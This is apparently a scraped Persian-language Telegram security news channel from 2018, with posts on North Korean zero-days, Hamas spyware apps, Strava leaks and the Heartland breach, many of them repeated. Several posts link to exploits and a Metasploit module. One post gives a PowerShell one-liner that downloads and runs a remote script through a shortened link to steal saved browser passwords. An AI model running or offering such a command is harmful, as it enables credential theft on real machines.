لینوکس SUSE که متعلق به یک شرکت بریتانیایی بود با قیمت 2.5 میلیارد دلار به یک شرکت سهامی سوئدی فروخته شد.
https://thehackernews.com/2018/07/suse-linux-acquired.html
#news
#linux
@sec_nerd
https://thehackernews.com/2018/07/suse-linux-acquired.html
#news
#linux
@sec_nerd
هکرهای کره شمالی با کشف یک باگ 0day در یک نرم افزار دولتی کره جنوبی، حملات خود را به سیستم های حکومتی این کشور آغاز کرده اند. این نرم افزار همواره در سیستم های دولتی، پس از بوت شدن سیستم در حال اجرا است و در اینترنت اکسپلورر و کروم به راحتی و با بازدید از یک وبسایت آلوده به اکسپلویت به راحتی حمله را میتوان اجرا کرد!
https://twitter.com/issuemakerslab/status/1014227462157287424
#nk
#sk
#0day
@sec_nerd
https://twitter.com/issuemakerslab/status/1014227462157287424
#nk
#sk
#0day
@sec_nerd
Twitter
Simon Choi
NK hackers have started using the SK's software 0-day vuln. Affected SW is installed from government services and is always in process state after booting. Not only IE but even Chrome can activate the vuln by visiting a specially crafted website. It is a…
امنیت اطلاعات
هکرهای کره شمالی با کشف یک باگ 0day در یک نرم افزار دولتی کره جنوبی، حملات خود را به سیستم های حکومتی این کشور آغاز کرده اند. این نرم افزار همواره در سیستم های دولتی، پس از بوت شدن سیستم در حال اجرا است و در اینترنت اکسپلورر و کروم به راحتی و با بازدید از…
ارتش سایبری کره شمالی دارای ۱۷۰۰ هکر در ۶ تیم و ۵۱۰۰ هکر در ۱۷ تیم دیگر است!
https://twitter.com/issuemakerslab/status/1011392967653769216
#nk
#0day
@sec_nerd
https://twitter.com/issuemakerslab/status/1011392967653769216
#nk
#0day
@sec_nerd
Twitter
Simon Choi
According to the NIS, North Korea's cyber hacking organization has 1,700 hackers from 6 organizations and about 5100 from 17 organizations supporting the hacking.
اکسپلویت اجرای دستور از راه دور در سیستم مدیریت محتوای CMS made Simple 2.2.5
کد شناسه CVE-2018-1000094
https://github.com/strukt93/exploits/blob/master/CVE-2018-1000094.py
#web
#pentest
#0day
#exploit
#cms_made_simple
@sec_nerd
کد شناسه CVE-2018-1000094
https://github.com/strukt93/exploits/blob/master/CVE-2018-1000094.py
#web
#pentest
#0day
#exploit
#cms_made_simple
@sec_nerd
GitHub
exploits/CVE-2018-1000094.py at master · strukt93/exploits
Contribute to strukt93/exploits development by creating an account on GitHub.
اخیرا نقشه تعاملی بر روی اینترنت قرار گرفته است که پسورد سرویس وای فای فرودگاه های کشورهای مختلف را به کاربران ارائه میکند.
این سرویس توسط یک محقق امنیتی و جهانگرد به نام Anil Polat طراحی شده است.
این سرویس که WiFox نام دارد برای کاربران اندروید و ios اپ هایی نیز ارائه میکند.
اندروید:
https://play.google.com/store/apps/details?id=com.foxnomad.wifox.wifox&hl=en
ios:
https://itunes.apple.com/us/app/wifox/id1130542083?mt=8
البته استفاده از کانکشن های وای فای در اماکن عمومی به هیچ وجه توصیه نمیشود اما میتوانید با رعایت موارد امنیتی نظیر بکارگیری vpn های امن مانند tor،از این امکانات بهره ببرید (با نظر به این نکته که در فرودگاههای ایران ساعات زیادی رو باید منتظر پروازتون باشید!)
این نقشه، پسورد وایفای فرودگاه امام خمینی (ره) را نیز دارد که در پست بعد خواهیم دید.
شایان ذکر است که این نقشه و اطلاعات فرودگاهها و پسوردها به صورت روزانه در حال بروزرسانی است.
منبع؛
https://www.hackread.com/airports-free-wifi-passwords-map/
#news
#wifi
#security
#airport
#travel
@sec_nerd
این سرویس توسط یک محقق امنیتی و جهانگرد به نام Anil Polat طراحی شده است.
این سرویس که WiFox نام دارد برای کاربران اندروید و ios اپ هایی نیز ارائه میکند.
اندروید:
https://play.google.com/store/apps/details?id=com.foxnomad.wifox.wifox&hl=en
ios:
https://itunes.apple.com/us/app/wifox/id1130542083?mt=8
البته استفاده از کانکشن های وای فای در اماکن عمومی به هیچ وجه توصیه نمیشود اما میتوانید با رعایت موارد امنیتی نظیر بکارگیری vpn های امن مانند tor،از این امکانات بهره ببرید (با نظر به این نکته که در فرودگاههای ایران ساعات زیادی رو باید منتظر پروازتون باشید!)
این نقشه، پسورد وایفای فرودگاه امام خمینی (ره) را نیز دارد که در پست بعد خواهیم دید.
شایان ذکر است که این نقشه و اطلاعات فرودگاهها و پسوردها به صورت روزانه در حال بروزرسانی است.
منبع؛
https://www.hackread.com/airports-free-wifi-passwords-map/
#news
#wifi
#security
#airport
#travel
@sec_nerd
Google Play
WiFox - Apps on Google Play
WiFox is a continually updated map of airport & lounge wifi passwords worldwide.
هکرهای گروه مقاومت فلسطینی حماس با استفاده از اپلیکیشن های ساختگی فوتبال و دوستیابی گوشی های موبایل سربازان اسراییلی را هک کردند.
به گفته وزارت جنگ اسراییل، برنامه اندرویدی جام جهانی و دوست یابی در گوگل پلی با بدافزار سرقت کننده داده ترکیب شده بود.
این برنامه ها به هکرها اجازه دستیابی به موقعیت مکانی و لیست مخاطبین، فایلها و تصاویر و همچنین دوربین و میکروفن رو میدهد.
برنامه مربوط به فوتبال با نام Golden Cup که برنامه بسیار خوبی ست، قابلیت پخش بازی های جام جهانی به صورت HD و اخبار جام جهانی را در خود داشت.
حدود ۱۰۰ سرباز زن و مرد پس از دریافت پیشنهادات در فضای مجازی، اقدام به نصب این برنامه ها کرده اند.
گروه فلسطینی حماس از اظهار نظر در این خصوص خودداری کرده است.
این عملیات با نام قلب شکسته شناخته میشود.
منبع:
https://www.independent.co.uk/news/world/middle-east/israel-world-cup-app-hamas-hack-soldiers-idf-a8430471.html
#news
#israel
#palestin
#malware
#android
#social_engineering
@sec_nerd
به گفته وزارت جنگ اسراییل، برنامه اندرویدی جام جهانی و دوست یابی در گوگل پلی با بدافزار سرقت کننده داده ترکیب شده بود.
این برنامه ها به هکرها اجازه دستیابی به موقعیت مکانی و لیست مخاطبین، فایلها و تصاویر و همچنین دوربین و میکروفن رو میدهد.
برنامه مربوط به فوتبال با نام Golden Cup که برنامه بسیار خوبی ست، قابلیت پخش بازی های جام جهانی به صورت HD و اخبار جام جهانی را در خود داشت.
حدود ۱۰۰ سرباز زن و مرد پس از دریافت پیشنهادات در فضای مجازی، اقدام به نصب این برنامه ها کرده اند.
گروه فلسطینی حماس از اظهار نظر در این خصوص خودداری کرده است.
این عملیات با نام قلب شکسته شناخته میشود.
منبع:
https://www.independent.co.uk/news/world/middle-east/israel-world-cup-app-hamas-hack-soldiers-idf-a8430471.html
#news
#israel
#palestin
#malware
#android
#social_engineering
@sec_nerd
The Independent
Hamas hacked Israeli soldiers through World Cup app, Israel says
‘Operation Broken Heart’ finds Palestinian militants allegedly using increasingly sophisticated football and dating apps to spy on young troops
دور زدن سیستم احراز هویت سرورهای HP iLO 4 با استفاده از تکرار حرف A در هدر http
ماژول متاسپلویت
https://www.rapid7.com/db/modules/auxiliary/admin/hp/hp_ilo_create_admin_account
منبع:
https://www.bleepingcomputer.com/news/security/you-can-bypass-authentication-on-hpe-ilo4-servers-with-29-a-characters/
#news
#vuln
#Hp
@sec_nerd
ماژول متاسپلویت
https://www.rapid7.com/db/modules/auxiliary/admin/hp/hp_ilo_create_admin_account
منبع:
https://www.bleepingcomputer.com/news/security/you-can-bypass-authentication-on-hpe-ilo4-servers-with-29-a-characters/
#news
#vuln
#Hp
@sec_nerd
BleepingComputer
You Can Bypass Authentication on HPE iLO4 Servers With 29 "A" Characters
Details and public exploit code have been published online for a severe vulnerability affecting Hewlett Packard Integrated Lights-Out 4 (HP iLO 4) servers.
This media is not supported in your browser
VIEW IN TELEGRAM
پرت کردن حواس فروشنده و جاسازی قاب از پیش طراحی شده برای دزدیدن اطلاعات کارتهای اعتباری
#skimmer
#creditcard
@sec_nerd
#skimmer
#creditcard
@sec_nerd
موتور جستجوی باکت های آمازون که بصورت ناامن در اینترنت قرار گرفته اند
https://buckets.grayhatwarfare.com
#amazon
#s3
#cloud
@sec_nerd
https://buckets.grayhatwarfare.com
#amazon
#s3
#cloud
@sec_nerd
امنیت اطلاعات
نرم افزار ورزشی Strava اخیرا نقشه گرمایی از کاربرانش منتشر کرده که در آن ساختار پایگاه های نظامی در جهان نیز به وضوح قابل مشاهده است. این اتفاق پس از استفاده سربازان از این برنامه رخ داده است. به گفته یکی از سخنگویان، ارتش امریکا تاکنون از این نقشه گرمایی…
جزییاتی جدید از برنامه ورزشی Strava که نقشه پابلیک آن و نمایش دادن کاربران و مسیرهای طی شده آنان توسط این برنامه، باعث شد که پایگاه های نظامی و مراکز هسته ای و امنیتی فراوانی که اغلب در کشورهای غربی وجود داشتند شناسایی شده و کارکنان این مراکز نیز در معرض خطر سوء استفاده قرار گیرند.
اطلاعات بیشتر را در لینک زیر مطالعه کنید:
https://decorrespondent.nl/8481/heres-how-we-found-the-names-and-addresses-of-soldiers-and-secret-agents-using-a-simple-fitness-app/412999257-6756ba27
#usa
#nsa
#surveillance
#military
#news
@sec_nerd
اطلاعات بیشتر را در لینک زیر مطالعه کنید:
https://decorrespondent.nl/8481/heres-how-we-found-the-names-and-addresses-of-soldiers-and-secret-agents-using-a-simple-fitness-app/412999257-6756ba27
#usa
#nsa
#surveillance
#military
#news
@sec_nerd
De Correspondent
Here’s how we found the names and addresses of soldiers and secret agents using a simple fitness app
How can a simple running app let you identify military personnel, intelligence operatives, and other users – and even pinpoint their home address? In this piece, we explain step by step how we were able to do it.
credgrap_ie_edge.ps1
507 B
اسکریپت پاورشل برای استخراج پسوردهای ذخیره شده در اینترنت اکسپلورر و Edge
دستور:
powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://bit.ly/2K75g15’)"
@sec_nerd
دستور:
powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://bit.ly/2K75g15’)"
@sec_nerd
در سال ۲۰۰۹ کمپانی Heartland توسط هکری مورد حمله قرار گرفت و اطلاعات بیش از ۱۰۰ میلیون کارت اعتباری توسط مهاجم به سرقت رفت. این هک که جزو بزرگترین حملات قرن بیستم به حساب می آید هزینه های زیادی را برای هارتلند به همراه داشت و در مجموع بیش از ۱۴۸ میلیون دلار برای برخی فرآیندهای قانونی، بدهی به مشتریان و غیره هزینه شد.
از آنجایی که هارتلند توسط دو شرکت دیگر بیمه شده بود، خسارت های ناشی از این حمله توسط این دو شرکت به هارتلند پرداخت شد و یکی از این دو شرکت مبلغ ۲۰ میلیون و دیگری ۱۰ میلیون دلار از هزینه های هارتلند را جبران کردند.
اما اکنون پس از گذشت ۹ سال این دو شرکت بیمه با شکایت از شرکت امنیتی که هارتلند با آن قرارداد داشت، سعی دارند پول های از دست رفته خود را برگردانند. آنها معتقدند شرکت امنیتی مذکور به درستی به تعهدی که در قرارداد به آن اشاره شده ، پایبند نبوده است.
شرکتهای بیمه اعلام کرده اند که شرکت Trustwave در شناسایی حمله تزریق SQL که در سال ۲۰۰۷ علیه هارتلند رخ داده بود اهمال کرده است.
همچنین تراست ویو از تشخیص نصب بدافزار بر روی سرورهای پرداخت در سال ۲۰۰۸ نیز ناتوان بوده و هیچ هشداری را در این خصوص منتشر نکرده است.
همچنین Visa اعلام کرده است که تایید تراست ویو مبنی بر سازگاری هارتلند با استاندارد PCI DSS (خلاصه The Payment Card Industry Data Security Standard) نیز درست نبوده و احتمال محکوم شدن تراست ویو بسیار زیاد است.
از سوی دیگر اما تراست ویو اعتقادی به این مطالب ندارد و این موضوع را یک داستان قدیمی میداند.
شایان ذکر است که تراست ویو پیش از این در کیس های مشابهی مورد شکایت قرار گرفته است.
منبع:
https://www.bleepingcomputer.com/news/security/security-firm-sued-for-failing-to-detect-malware-that-caused-a-2009-breach/
#news
#breach
#usa
@sec_nerd
از آنجایی که هارتلند توسط دو شرکت دیگر بیمه شده بود، خسارت های ناشی از این حمله توسط این دو شرکت به هارتلند پرداخت شد و یکی از این دو شرکت مبلغ ۲۰ میلیون و دیگری ۱۰ میلیون دلار از هزینه های هارتلند را جبران کردند.
اما اکنون پس از گذشت ۹ سال این دو شرکت بیمه با شکایت از شرکت امنیتی که هارتلند با آن قرارداد داشت، سعی دارند پول های از دست رفته خود را برگردانند. آنها معتقدند شرکت امنیتی مذکور به درستی به تعهدی که در قرارداد به آن اشاره شده ، پایبند نبوده است.
شرکتهای بیمه اعلام کرده اند که شرکت Trustwave در شناسایی حمله تزریق SQL که در سال ۲۰۰۷ علیه هارتلند رخ داده بود اهمال کرده است.
همچنین تراست ویو از تشخیص نصب بدافزار بر روی سرورهای پرداخت در سال ۲۰۰۸ نیز ناتوان بوده و هیچ هشداری را در این خصوص منتشر نکرده است.
همچنین Visa اعلام کرده است که تایید تراست ویو مبنی بر سازگاری هارتلند با استاندارد PCI DSS (خلاصه The Payment Card Industry Data Security Standard) نیز درست نبوده و احتمال محکوم شدن تراست ویو بسیار زیاد است.
از سوی دیگر اما تراست ویو اعتقادی به این مطالب ندارد و این موضوع را یک داستان قدیمی میداند.
شایان ذکر است که تراست ویو پیش از این در کیس های مشابهی مورد شکایت قرار گرفته است.
منبع:
https://www.bleepingcomputer.com/news/security/security-firm-sued-for-failing-to-detect-malware-that-caused-a-2009-breach/
#news
#breach
#usa
@sec_nerd
BleepingComputer
Security Firm Sued for Failing to Detect Malware That Caused a 2009 Breach
Two insurance companies are suing a cyber-security firm to recover insurance fees paid to a customer after the security firm failed to detect malware on the client's network for months, an issue that led to one of the biggest security breaches of the 2000s.…
شناسایی تحرکات مخرب در powershell با استفاده از تکنیکهای یادگیری ماشین
https://bit.ly/2u9jecw
#ps
#ml
#windows
@sec_nerd
https://bit.ly/2u9jecw
#ps
#ml
#windows
@sec_nerd